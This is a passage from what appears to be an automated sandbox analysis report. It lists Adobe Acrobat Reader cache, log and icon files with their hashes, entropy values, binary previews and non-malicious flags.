                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\aba6710fde0876af_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):188
                                                    Entropy (8bit):5.609581978289309
                                                    Encrypted:false
                                                    SSDEEP:3:m+l8UElLA8RzYOCGLvHkWBGKuKPK7Cv9Rz1qMktLEBiaQ562HvpMm1:mAElVYOFLvEW1K2xYltlx56uvp1
                                                    MD5:9B1A149C8D26EB82D5A5E3B4E4F1E008
                                                    SHA1:18ECF8A5816A24FE66478A7DC3F070E2364E35C7
                                                    SHA-256:7F56B95DAB25FE40CDBC57E8F5FE8A92CFEA6C6573C6BA7222ADF570AFE0D4D2
                                                    SHA-512:52BA9DD83547733B9C986F24B060484444FC2605B0DD31E1F751FDF2563118801E0DD54C0BE5A95F4B562D4210068B84986F7A53BA1F70214E4970B886DD6FCB
                                                    Malicious:false
                                                    Preview:0\r..m......<...)6......_keyhttps://rna-resource.acrobat.com/static/js/rna-main.js ...r..[/....."#.D..;..A.A..Eo..................z?...SwC...^..y.....V..7R-O.....A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\b6d5deb4812ac6e9_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):214
                                                    Entropy (8bit):5.642125461382876
                                                    Encrypted:false
                                                    SSDEEP:6:mWYOFLvEWdBJvvuHV9l20hltO/lTUDLYtmOZn1:xRBJEV9lhj4tYDcFZ
                                                    MD5:DA55280F66B319A14F817F86BBEB97E6
                                                    SHA1:B4A3ADB857664C7D96F867A47324F2A6C5D565D6
                                                    SHA-256:3286F9D6F1B8834C72AFB9E3D4BB82C05D9CCE361800CC481E455CE6E22F40C6
                                                    SHA-512:5DBFA105062091DBD1C9844D0E51D1AB7EF9B3658A66BBC9D684039491525B9CFEB4A1A828F170295ACB760341306E1EAF54E672784D82DB262065EE1BAE92DA
                                                    Malicious:false
                                                    Preview:0\r..m......V.....h....._keyhttps://rna-resource.acrobat.com/static/js/plugins/activity-badge/js/selector.js ..?...[/....."#.D_|!.;..A.A..Eo.......)..............t.q..W.EZ....1...[.zC.7mD..A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bba29d2e6197e2f4_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):211
                                                    Entropy (8bit):5.5722717709502945
                                                    Encrypted:false
                                                    SSDEEP:6:msRPYOFLvEWIa7zp7Vu1/lm1ltJ5998VPu1:BPHPM/lSJ9m
                                                    MD5:91FEB673D21E16AFBBDED4D4CAD4751C
                                                    SHA1:6C74E511FEFCB304C6B166B14D4669118E466B39
                                                    SHA-256:935A6611A90B6DBE0F0A5FC2868E363D2EBA87537C0189E4806B62796C119796
                                                    SHA-512:2AFFE2DC7DE47E3AE17A1493FB7843C81A1EA89CC8E34908819EDC9DCA76ED85A6FA9D31D4516E5CFAB8735273CEFEC604B36E2F6EDE782A6D6DC98DDC471EAD
                                                    Malicious:false
                                                    Preview:0\r..m......S...{.j....._keyhttps://rna-resource.acrobat.com/static/js/libs/require/2.1.15/require.min.js ...o..[/....."#.D_{.;..A.A..Eo......9. ............L...Im.@.........E.nW...IP..A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bf0ac66ae1eb4a7f_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):208
                                                    Entropy (8bit):5.628911693221753
                                                    Encrypted:false
                                                    SSDEEP:3:m+lQi9lC8RzYOCGLvHkWBGKuKjXKVRNUpXKLuV34/u0hMktdFll6F4XVAZ+8cV3I:mKPYOFLvEWdENU9Q7phltdMwiM3Y1
                                                    MD5:648C8F1A37EC2A2C6B59E0BCAB5EB2C2
                                                    SHA1:49D6B3BA959A8289E60F87D0EEB8346A1400C898
                                                    SHA-256:2BDD725BB3FDB52FD88EB2A704D744D9DEACDE2948EECA11E0F8209666C5757F
                                                    SHA-512:A34CC4DDAEE2B1C483DC06465F5E891139F27EA627973DB10DC7C878924B98EBB70CA16821E31A3FA686C368A404A35A3EE6C2B0416E75D13072830A7C3F0A22
                                                    Malicious:false
                                                    Preview:0\r..m......P...Yft....._keyhttps://rna-resource.acrobat.com/static/js/plugins/uss-search/js/plugin.js ....[/....."#.D^...;..A.A..Eo....................M....m+lS..e.....<7.U.P8*.0K.A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\cf3e34002cde7e9c_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):208
                                                    Entropy (8bit):5.648622584904974
                                                    Encrypted:false
                                                    SSDEEP:6:mQt6EYOFLvEWdccAHQ5al5eThltjjBRCh/41:XRc96al5qNDi/
                                                    MD5:807BC76D709EDCD3CC90D34BE6241237
                                                    SHA1:9672014C97103BA3B12A97A63DD1890AE3CF82B4
                                                    SHA-256:3B99B7273AE5655BF9CF7E10F1254A053F36A0EDFAB93AD0B28D601244FDECCE
                                                    SHA-512:99346CCCB5B3D69C32705406912ECC99794CC8BBD392F453728A01A6C7178F8B7A7DE36CEDEDB11FD8F47A8529A866A1D96E972EC7F058E5FBAA708B6A6DA80F
                                                    Malicious:false
                                                    Preview:0\r..m......P...W3......_keyhttps://rna-resource.acrobat.com/static/js/plugins/scan-files/js/plugin.js .K...[/....."#.D.8,.;..A.A..Eo.......-..........PJm...0x.x..RD...BB!@5..<..]....A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d449e58cb15daaf1_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):231
                                                    Entropy (8bit):5.618515586885466
                                                    Encrypted:false
                                                    SSDEEP:6:mqs6XYOFLvEWdFCi5mhuEt/y/ltsgvkULlF4r1:bs6xRkiKt/utv7LlF4
                                                    MD5:2D65DFE5E0E22DC21AB503C92999C57C
                                                    SHA1:B5BFEE2CF11958567792E650647B10E15574954D
                                                    SHA-256:8D687D059F03491E01E826F255FB93E211655E6CF5E5393A33AC3843EB9E44C3
                                                    SHA-512:0E0B0E87B3EB1EF63FC762186200F2FB29DEDCE72CD4F98ECDD143F13BB6C2AEED38D62BE8FE617AA09670E92AF8B9659384B1E7F344DCCB6F111C2D30764DF8
                                                    Malicious:false
                                                    Preview:0\r..m......g...~.I?...._keyhttps://rna-resource.acrobat.com/static/js/plugins/aicuc/js/plugins/rhp/exportpdf-rna-selector.js ..nL..[/....."#.D.W,.;..A.A..Eo......^..M.........P...#4..l....5...5..).w.. .h.~..A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d88192ac53852604_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):215
                                                    Entropy (8bit):5.541491028431216
                                                    Encrypted:false
                                                    SSDEEP:3:m+lPHYs8RzYOCGLvHkWBGKuKjXKXqjuSKPWFvNo+/Dru9hMktbCNECcu1isLK5m1:mhYOFLvEWd/aFuw+/Hu9hltbCNEN941
                                                    MD5:AA0844B43907AC101E6CB4B83304B5FF
                                                    SHA1:A81E81A431FA4CB99C783927A531037F9153AFBE
                                                    SHA-256:981F38A299BE680E152B35FC79B2BBAA42B38E86BFC4736B28579869AFB82310
                                                    SHA-512:D49D8E488B11F7BA985E0EC95FFEBC5F6F0E94219432C9FA38EE55E585100F99B71F58122F0DC8AD1AB3BF5B54642985092B731A5F3F75CE77ABB52B758C8E51
                                                    Malicious:false
                                                    Preview:0\r..m......W....w.m...._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-recent-files/js/selector.js .....[/....."#.D....;..A.A..Eo......zV*............a.f.m.i.o.p..3U5.....^...I.A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\de789e80edd740d6_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):208
                                                    Entropy (8bit):5.563022573534017
                                                    Encrypted:false
                                                    SSDEEP:6:mR9YOFLvEWd7VIGXOdQd+u59hltKXVBMqVd3G4K41:2DRuRYH590VB9Vd2
                                                    MD5:B451E5DDA0922BC318B03C9433677DDB
                                                    SHA1:163CB86A6CAE713941F9E9D942208C96388C592F
                                                    SHA-256:98B1E86D46C334FA2B1C0BF9A71524182F09AF3CA1AE50A1ED9E3CFB35FBF04D
                                                    SHA-512:BDAE675247ACAF0BFB33EA02B370E3C80DDFC8062B72FC031FD5977C56F83C64E8F1003EAA8CF23996D96AF7D178001CFA08522009D491ED815B889692665A74
                                                    Malicious:false
                                                    Preview:0\r..m......P...y.p....._keyhttps://rna-resource.acrobat.com/static/js/plugins/app-center/js/plugin.js ....[/....."#.DU...;..A.A..Eo.......b+...........y.$..$.v5j...T...z.]..._S....A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f0cf6dfa8a1afa3d_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):208
                                                    Entropy (8bit):5.576121068263361
                                                    Encrypted:false
                                                    SSDEEP:6:mkqYOFLvEWd8CAd9Qvh+uoqlt3AuA424r1:+RQcH3BLr
                                                    MD5:B7929F7741ABE3FCCAC7129D113BBAD4
                                                    SHA1:98CE755A3CBFD34C4EDD9510E1D1FEA4AF4AECDD
                                                    SHA-256:F09FF31D8D12D64558BF478BB12760FB039EDF1C34128C6A6C83447BCB77549F
                                                    SHA-512:86DEBBFF36999B8B798B503336BC58A6F53DBFD159A1B97D031D484C6CADA8542087EE61D0E7B9BFCFA835A27BEC2B78426B44F076A3302C55D1CD89D6812FDA
                                                    Malicious:false
                                                    Preview:0\r..m......P...gT....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/plugin.js .6....[/....."#.Ds.3.;..A.A..Eo......mc.{........#..@..k(v.8g..5.~_....]Pj.*..6.A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f4a0d4ca2f3b95da_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):210
                                                    Entropy (8bit):5.602976353587929
                                                    Encrypted:false
                                                    SSDEEP:6:moXXYOFLvEWdENUAudqep/ltb/+yC8n1:xhRTbqu987
                                                    MD5:38BA97D82D67FEFC55C46CBF11D10D29
                                                    SHA1:0F8ADBA24317308DC5BDCC8A411D76264E3446DD
                                                    SHA-256:D129014BFB8C1A3CAE432F1DC35D80723DBE8629C477D792A5DAF40A3CDE84AB
                                                    SHA-512:A7B79B2D49CD68561F2E8FA73F196B999E95FFDBA0BC6CA95F6CBD6934E83E5A7E5E2FE3ED5812822A088839D7B5C5B34A7D32430775723C8EFE4BE35B2EB96C
                                                    Malicious:false
                                                    Preview:0\r..m......R..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/uss-search/js/selector.js .],...[/....."#.D.P..;..A.A..Eo.................8.../...;.\\o....1..........+..A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f941376b2efdd6e6_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):221
                                                    Entropy (8bit):5.613255549588016
                                                    Encrypted:false
                                                    SSDEEP:6:mQZYOFLvEWdrROk/VQlwGThltunsLmB41:nRrROk/VuZHQnN
                                                    MD5:9F3CA6EB22708090B9A9B9B299664B72
                                                    SHA1:94EA2F62CFB25EA39405E81D1D2E9E263FC993A0
                                                    SHA-256:030A729B6F1210991AB378DAA4836393E2968CDAD4993100A1831C7C5361B5FE
                                                    SHA-512:5EBABE47513C3C1115B211A794C08DE61092829E3FADDC53C00F49A8688B8C0729F16A3A53A59E2BCD091D53B5387DADAFB077415A96E9E1733D62D0394890FE
                                                    Malicious:false
                                                    Preview:0\r..m......]......,...._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/plugin.js .;....[/....."#.D....;..A.A..Eo.......E.......... ./.ev......N~..6.b.....$.j;:C...A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f971b7eda7fa05c3_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):210
                                                    Entropy (8bit):5.587991702396494
                                                    Encrypted:false
                                                    SSDEEP:6:mZ/lXYOFLvEWdccAWu0/lA3hltNL5dm9741:qxRcG/lA3j7Vdu7
                                                    MD5:3DEF38FE6402170FA23090E7E0B3754E
                                                    SHA1:103211066C047DE4F422D4F3169F89746B08D29B
                                                    SHA-256:429E4BC3E42B611E2204AA739D571C39ADA99C38885EC0CA2F525B70278A628C
                                                    SHA-512:1A4491C185C548FB52512B8D4042296B035C2744ECB45B755609AA3E671E1D855946F935ED2ED72278C23401682F73B5A79FA7C6170E36E0A94A260BD533C279
                                                    Malicious:false
                                                    Preview:0\r..m......R...F......._keyhttps://rna-resource.acrobat.com/static/js/plugins/scan-files/js/selector.js ......[/....."#.D./!.;..A.A..Eo.......K.............U...I.>P...X...x..0U.~;m.x.k.A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fd17b2d8331c91e8_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):204
                                                    Entropy (8bit):5.5818316592977695
                                                    Encrypted:false
                                                    SSDEEP:3:m+lUg18RzYOCGLvHkWBGKuKjXKrAUWiKPWFvMMmtwu9T1/Mkti/UB6shoq+Nem1:mMOYOFLvEWdwAPVui6uL/ltCUB6Jn1
                                                    MD5:37CC46159C9EC061121175CA4503D4B8
                                                    SHA1:F7AD56C1B1C4B1C8BD94792874EA66C68A57AC3D
                                                    SHA-256:37866CEB4C8B8202B2400782231B26921AA9B98F701C458E8CB7AA0EA36221CE
                                                    SHA-512:5A6FE9EAC032670CC506464EC83F5F8908FFD031501AD6CCAB06321D810571CA76B01C64B53305133CDED47BCD3DBA96D0BB8E845C0CE50065FAC0D5791C04FE
                                                    Malicious:false
                                                    Preview:0\r..m......L....Ey....._keyhttps://rna-resource.acrobat.com/static/js/plugins/home/js/selector.js ..)...[/....."#.D.#..;..A.A..Eo.......q.8.............k....F..D..O.n;[.1m.....=..A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fdd733564de6fbcb_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:modified
                                                    Size (bytes):212
                                                    Entropy (8bit):5.623994039037791
                                                    Encrypted:false
                                                    SSDEEP:6:m3PXYOFLvEWdBJvYQ6BGThltLahcsBXIh1:mxRBJQZ0dKB
                                                    MD5:35C14C3D09EED342D0409267DE78071F
                                                    SHA1:387465BD6B70CAAF7B5A469A5CC7F92AFA8959DC
                                                    SHA-256:FF81058E7FD26B6BCDA4B51638CAE3F0A4DFE8545C611D0A4986F4E257B6D047
                                                    SHA-512:17C9A52B2EA3A0D03EF3CA8CBD4ED43027C445A69C7183F99496BD1FD70644D9E283A30181A46E375F1B5E56E803C690D5AEED14FADF139007CFBA6320083A4D
                                                    Malicious:false
                                                    Preview:0\r..m......T......z...._keyhttps://rna-resource.acrobat.com/static/js/plugins/activity-badge/js/plugin.js ......[/....."#.D.t..;..A.A..Eo........a............k..`..N3.... ..d..$[.....{.A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\febb41df4ea2b63a_0

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):228
                                                    Entropy (8bit):5.6014846564470595
                                                    Encrypted:false
                                                    SSDEEP:6:msPYOFLvEWdrROk/RJUQX1973hlthBc3Me/1:3RrROk/sQ19TjR
                                                    MD5:995D232B43BF92FA285BABD0E3287870
                                                    SHA1:6CC5107EF341341316C099E92A8A7E9935F3BE1F
                                                    SHA-256:882F8F9AF4340626EF319B9CF0D5364D226840B22D31B5BB4D96E39564D4506A
                                                    SHA-512:E0B217BED28A792398FA5E2268453C2B45C963C13A459B6F9C85E117F9F9B90AC1BC4D166CB07AF34EAC6623C1A89E948D28B83BAEB2A669FEF53E646A11C1A3
                                                    Malicious:false
                                                    Preview:0\r..m......d...<.s....._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/plugin.js ......[/....."#.D....;..A.A..Eo.......................9Q].8O.z....=..:.N.{....N{.A..Eo..................

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\temp-index

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1008
                                                    Entropy (8bit):4.9428322076581255
                                                    Encrypted:false
                                                    SSDEEP:12:p+ik+weCRa5tbaLP+D5vSLvxgKMzl1WPCpPUa8ymo6+QLwPivLw+23QQMrCNxTvR:pHQeFMLDMx/6hcNTdxoe
                                                    MD5:6D17E822E5310CB2EFF0DDF77C476390
                                                    SHA1:D04EF554462B27C8B39F27BFE3A568E89A918940
                                                    SHA-256:23588BA4059AB301838562E5E108C22D5776648F10CB899A5316E471548D0072
                                                    SHA-512:561A5C74C2964EA51F66B93D53C1EE58BAB78F09C8DBC4DD15D54EF66F1EA64BB49967B6CFDDFD6A317C0651D2A2311F26F1E7D4C7957758AFE7B948BD38B38A
                                                    Malicious:false
                                                    Preview:....K.[.oy retne....(........P............*.......[/...........;.y~A......[/..............oB*..p..[/............#...(@..................D.4......[/..........[.i..%......[/.............k7A......[/..........]...I...C..[/.........,+..._.#.....[/.........<...W..J..p..[/..........J..j........[/...........6<|.....p..[/...........2q.........[/...........P....V.....[/.........!...0.o.....[/............P[. q.....[/...........3........[/..........v...q....p..[/...........a......p..[/..........C..M..@..............F..=z;......[/.............o......[/.........Gy.'.h......[/.........:..N.A.......[/..........;/........[/.....................[/.........A?.2:.......[/..............q......[/..........u\]..q.....[/..........o..k.......[/...........*.........[/.........^.~..z......[/.........+.U.!..V.....[/..........~.,.4>......[/..........+.{..'.....[/..........@..x......[/............MV3.......[/.........*)....J:.....[/..........&.S.........[/.........=....m.......[/.........

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\the-real-index (copy)

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1008
                                                    Entropy (8bit):4.9428322076581255
                                                    Encrypted:false
                                                    SSDEEP:12:p+ik+weCRa5tbaLP+D5vSLvxgKMzl1WPCpPUa8ymo6+QLwPivLw+23QQMrCNxTvR:pHQeFMLDMx/6hcNTdxoe
                                                    MD5:6D17E822E5310CB2EFF0DDF77C476390
                                                    SHA1:D04EF554462B27C8B39F27BFE3A568E89A918940
                                                    SHA-256:23588BA4059AB301838562E5E108C22D5776648F10CB899A5316E471548D0072
                                                    SHA-512:561A5C74C2964EA51F66B93D53C1EE58BAB78F09C8DBC4DD15D54EF66F1EA64BB49967B6CFDDFD6A317C0651D2A2311F26F1E7D4C7957758AFE7B948BD38B38A
                                                    Malicious:false
                                                    Preview:....K.[.oy retne....(........P............*.......[/...........;.y~A......[/..............oB*..p..[/............#...(@..................D.4......[/..........[.i..%......[/.............k7A......[/..........]...I...C..[/.........,+..._.#.....[/.........<...W..J..p..[/..........J..j........[/...........6<|.....p..[/...........2q.........[/...........P....V.....[/.........!...0.o.....[/............P[. q.....[/...........3........[/..........v...q....p..[/...........a......p..[/..........C..M..@..............F..=z;......[/.............o......[/.........Gy.'.h......[/.........:..N.A.......[/..........;/........[/.....................[/.........A?.2:.......[/..............q......[/..........u\]..q.....[/..........o..k.......[/...........*.........[/.........^.~..z......[/.........+.U.!..V.....[/..........~.,.4>......[/..........+.{..'.....[/..........@..x......[/............MV3.......[/.........*)....J:.....[/..........&.S.........[/.........=....m.......[/.........

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\the-real-index~RF62858e.TMP (copy)

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1008
                                                    Entropy (8bit):4.9428322076581255
                                                    Encrypted:false
                                                    SSDEEP:12:p+ik+weCRa5tbaLP+D5vSLvxgKMzl1WPCpPUa8ymo6+QLwPivLw+23QQMrCNxTvR:pHQeFMLDMx/6hcNTdxoe
                                                    MD5:6D17E822E5310CB2EFF0DDF77C476390
                                                    SHA1:D04EF554462B27C8B39F27BFE3A568E89A918940
                                                    SHA-256:23588BA4059AB301838562E5E108C22D5776648F10CB899A5316E471548D0072
                                                    SHA-512:561A5C74C2964EA51F66B93D53C1EE58BAB78F09C8DBC4DD15D54EF66F1EA64BB49967B6CFDDFD6A317C0651D2A2311F26F1E7D4C7957758AFE7B948BD38B38A
                                                    Malicious:false
                                                    Preview:....K.[.oy retne....(........P............*.......[/...........;.y~A......[/..............oB*..p..[/............#...(@..................D.4......[/..........[.i..%......[/.............k7A......[/..........]...I...C..[/.........,+..._.#.....[/.........<...W..J..p..[/..........J..j........[/...........6<|.....p..[/...........2q.........[/...........P....V.....[/.........!...0.o.....[/............P[. q.....[/...........3........[/..........v...q....p..[/...........a......p..[/..........C..M..@..............F..=z;......[/.............o......[/.........Gy.'.h......[/.........:..N.A.......[/..........;/........[/.....................[/.........A?.2:.......[/..............q......[/..........u\]..q.....[/..........o..k.......[/...........*.........[/.........^.~..z......[/.........+.U.!..V.....[/..........~.,.4>......[/..........+.{..'.....[/..........@..x......[/............MV3.......[/.........*)....J:.....[/..........&.S.........[/.........=....m.......[/.........

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):294
                                                    Entropy (8bit):5.147099460021813
                                                    Encrypted:false
                                                    SSDEEP:6:k7O62qROq2P92nKuAl9OmbnIFUtIO62XXVZmwuO62XXHkwO92nKuAl9OmbjLJ:kF2qOv4HAahFUtQ2XXV/e2XXH5LHAaSJ
                                                    MD5:B1428E07335D526543D146C183FF0C83
                                                    SHA1:6FB9CC658C45451C94EEA7297874CAFBAE0CAC9A
                                                    SHA-256:BC6214FE502F3028DA91CF1A77E6B89C5388E28CA38CBB45DF90A16D2E2F3E23
                                                    SHA-512:EF093ECA0EE2CBCC0DB398A78D4FC117C01A7C1F7F0B8735C3A7F1FA3F4F4D97E8328B17535FE6C0D60345185DF03E35C344C134A23688686E053B7A33C55C9D
                                                    Malicious:false
                                                    Preview:2023/06/01-12:14:42.713 11c4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2023/06/01-12:14:42.723 11c4 Recovering log #3.2023/06/01-12:14:42.723 11c4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):294
                                                    Entropy (8bit):5.147099460021813
                                                    Encrypted:false
                                                    SSDEEP:6:k7O62qROq2P92nKuAl9OmbnIFUtIO62XXVZmwuO62XXHkwO92nKuAl9OmbjLJ:kF2qOv4HAahFUtQ2XXV/e2XXH5LHAaSJ
                                                    MD5:B1428E07335D526543D146C183FF0C83
                                                    SHA1:6FB9CC658C45451C94EEA7297874CAFBAE0CAC9A
                                                    SHA-256:BC6214FE502F3028DA91CF1A77E6B89C5388E28CA38CBB45DF90A16D2E2F3E23
                                                    SHA-512:EF093ECA0EE2CBCC0DB398A78D4FC117C01A7C1F7F0B8735C3A7F1FA3F4F4D97E8328B17535FE6C0D60345185DF03E35C344C134A23688686E053B7A33C55C9D
                                                    Malicious:false
                                                    Preview:2023/06/01-12:14:42.713 11c4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2023/06/01-12:14:42.723 11c4 Recovering log #3.2023/06/01-12:14:42.723 11c4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old~RF621e68.TMP (copy)

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):294
                                                    Entropy (8bit):5.147099460021813
                                                    Encrypted:false
                                                    SSDEEP:6:k7O62qROq2P92nKuAl9OmbnIFUtIO62XXVZmwuO62XXHkwO92nKuAl9OmbjLJ:kF2qOv4HAahFUtQ2XXV/e2XXH5LHAaSJ
                                                    MD5:B1428E07335D526543D146C183FF0C83
                                                    SHA1:6FB9CC658C45451C94EEA7297874CAFBAE0CAC9A
                                                    SHA-256:BC6214FE502F3028DA91CF1A77E6B89C5388E28CA38CBB45DF90A16D2E2F3E23
                                                    SHA-512:EF093ECA0EE2CBCC0DB398A78D4FC117C01A7C1F7F0B8735C3A7F1FA3F4F4D97E8328B17535FE6C0D60345185DF03E35C344C134A23688686E053B7A33C55C9D
                                                    Malicious:false
                                                    Preview:2023/06/01-12:14:42.713 11c4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2023/06/01-12:14:42.723 11c4 Recovering log #3.2023/06/01-12:14:42.723 11c4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):131072
                                                    Entropy (8bit):0.007864178932406301
                                                    Encrypted:false
                                                    SSDEEP:3:ImtV+Y1UWu/lt4T16BSxztJC5Kv:IiV+SUrs10SsK
                                                    MD5:2797CC3B5A91317544E0D09184562E6A
                                                    SHA1:E394C8C10D9EE6FE720B9C33E9B5D64808A8F983
                                                    SHA-256:1903B6502C5D63A3D50E3211598F45BFCDCE86337AE76E07BC4540AC9CDAC89A
                                                    SHA-512:0D24ABFE4ECB15DCBB845E05C14C7A802F23B1FD62014A4A109D240661B0C679F665E9F2E82EF32360B86F7547BE55EAF0CEEFE13A242C2732275C4F5DB1A337
                                                    Malicious:false
                                                    Preview:VLnk.....?.......+.}.^1.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-230601191439Z-325.bmp

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                    File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                    Category:dropped
                                                    Size (bytes):65110
                                                    Entropy (8bit):0.6442903166717108
                                                    Encrypted:false
